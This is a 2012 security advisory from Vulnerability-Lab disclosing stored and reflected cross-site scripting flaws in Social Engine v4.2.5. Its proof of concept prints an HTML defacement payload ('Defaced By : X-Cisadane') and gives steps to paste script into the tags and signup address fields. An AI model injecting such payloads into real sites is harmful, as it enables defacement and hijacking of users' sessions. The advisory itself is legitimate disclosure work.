195 lines
No EOL
6.7 KiB
Text
195 lines
No EOL
6.7 KiB
Text
Title:
|
||
======
|
||
Social Engine v4.2.5 - Multiple Web Vulnerabilities
|
||
|
||
|
||
Date:
|
||
=====
|
||
2012-07-31
|
||
|
||
|
||
References:
|
||
===========
|
||
http://www.vulnerability-lab.com/get_content.php?id=672
|
||
|
||
|
||
VL-ID:
|
||
=====
|
||
672
|
||
|
||
|
||
Common Vulnerability Scoring System:
|
||
====================================
|
||
3
|
||
|
||
|
||
Abstract:
|
||
=========
|
||
A Laboratory Researcher [X-Cisadane] discovered multiple Web Vulnerabilities in the Social Engine v4.2.5 web application.
|
||
|
||
|
||
Report-Timeline:
|
||
================
|
||
2012-07-31: Public or Non-Public Disclosure
|
||
|
||
|
||
Status:
|
||
========
|
||
Published
|
||
|
||
|
||
Exploitation-Technique:
|
||
=======================
|
||
Remote
|
||
|
||
|
||
Severity:
|
||
=========
|
||
Medium
|
||
|
||
|
||
Details:
|
||
========
|
||
1.1
|
||
Multiple persistent input validation vulnerabilities are detected in the Social Engine v4.2.5 web application.
|
||
The bug allows an attackers to implement/inject malicious script code on the application side (persistent).
|
||
The persistent vulnerabilities are located in the add- new videos and classiefieds module with the bound vulnerable
|
||
tag (keywords) parameter. Successful exploitation of the vulnerability can lead to persistent session hijacking (manager/admin)
|
||
or stable (persistent) context manipulation. Exploitation requires low user inter action but a privileged user account.
|
||
|
||
|
||
Vulnerable Module(s):
|
||
[+] Add New Video
|
||
[+] Add New Classfields
|
||
|
||
|
||
Affected Module(s):
|
||
[+] Videos Listing Page
|
||
[+] Classfields Listing Page
|
||
|
||
|
||
Vulnerable Parameter(s):
|
||
[+] Tags (keywords)
|
||
|
||
|
||
1.2
|
||
A non persistent cross site scripting vulnerability is detected in the Social Engine v4.2.5 web application.
|
||
The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with medium
|
||
or high required user inter action or local low privileged user account. The bug is located in the signup (profile)
|
||
module with the bound vulnerable name and address parameters. Successful exploitation can result in account steal,
|
||
client side phishing & client-side content request manipulation. Exploitation requires medium or high user inter
|
||
action & without privileged web application user account.
|
||
|
||
Vulnerable Module(s):
|
||
[+] Profile - Signup
|
||
|
||
Vulnerable Parameter(s):
|
||
[+] Name & Address
|
||
|
||
|
||
Proof of Concept:
|
||
=================
|
||
1.1
|
||
The persistent vulnerability can be exploited by remote attackers with low required user inter action & low privileged
|
||
application user account. For demonstration or reproduce ...
|
||
|
||
|
||
- In the Post New Video Page (http://127.0.0.1:8080/videos/create)
|
||
Information: Copy & Paste persistent malicious script coe (js/html) into the Tags (keywords) field and save the context
|
||
|
||
|
||
- In the Post New Classfields Listing Page (http://127.0.0.1:8080/classifieds/create)
|
||
Information: Copy & Paste persistent malicious script coe (js/html) into the Tags (keywords) field and save the context
|
||
|
||
|
||
Picture : http://i47.tinypic.com/2ptcv29.png
|
||
Picture : http://i50.tinypic.com/14soaci.png
|
||
|
||
|
||
PoC:
|
||
|
||
<DIV align=left>
|
||
<DIV id=Layer1 style="BORDER-RIGHT: #000000 1px; BORDER-TOP: #000000 1px; 1; LEFT: 1px;
|
||
|
||
BORDER-LEFT: #000000 1px; WIDTH: 1500px; BORDER-BOTTOM: #000000 1px; POSITION: absolute;
|
||
|
||
TOP: 0px; HEIGHT: 5000px; BACKGROUND-COLOR: #000000; layer-background-color: #000000">
|
||
<br /><br />
|
||
<br>
|
||
<center>
|
||
<font face="Arial" color="red" size="4"><strong><br><br><br>Defaced By : X-Cisadane
|
||
<br>
|
||
</center>
|
||
<font face="Courier New" color="#FF0000" size="3"><center>Greetz To : X-Code, Borneo Crew,
|
||
|
||
Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club and Winda
|
||
|
||
Utari</center></font>
|
||
<center><img
|
||
|
||
src="http://obnoxiousgamer.files.wordpress.com/2010/01/jollyroger.gif"></img></center>
|
||
<center><font face="arial" size="3" color="#FF0000">
|
||
<marquee behavior="alternate" scrolldelay="100" style="width: 90%">Please fix your hole!
|
||
</li>
|
||
</ul>
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
</div>
|
||
|
||
|
||
|
||
1.2
|
||
The non persistent cross site scripting vulnerability can be exploited by remote attackers with medium or high required
|
||
user inter action and without privileged user account. For demonstration or reproduce ...
|
||
|
||
Information: Copy & Paste cross site scripting (script code) into the Profile Address Field of the signup form
|
||
URL: http://127.0.0.1:8080/signup
|
||
|
||
Picture : http://i45.tinypic.com/v46iyd.png
|
||
Picture : http://i49.tinypic.com/156e79h.png
|
||
|
||
|
||
|
||
Risk:
|
||
=====
|
||
1.1
|
||
The security risk of the persistent web vulnerabilities are estimated as medium(+).
|
||
|
||
1.2
|
||
The security risk of the client side cross site scripting vulnerability is estimated as low(+).
|
||
|
||
|
||
Credits:
|
||
========
|
||
X-Cisadane ( http://www.vulnerability-lab.com/show.php?user=X-Cisadane )
|
||
|
||
|
||
Disclaimer:
|
||
===========
|
||
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
|
||
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
|
||
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
|
||
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
|
||
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
|
||
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
|
||
or trade with fraud/stolen material.
|
||
|
||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
|
||
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
|
||
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
|
||
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||
|
||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
|
||
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
|
||
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
|
||
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
|
||
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.
|
||
|
||
Copyright <20> 2012 | Vulnerability Laboratory
|
||
|
||
--
|
||
VULNERABILITY RESEARCH LABORATORY
|
||
LABORATORY RESEARCH TEAM
|
||
CONTACT: research@vulnerability-lab.com |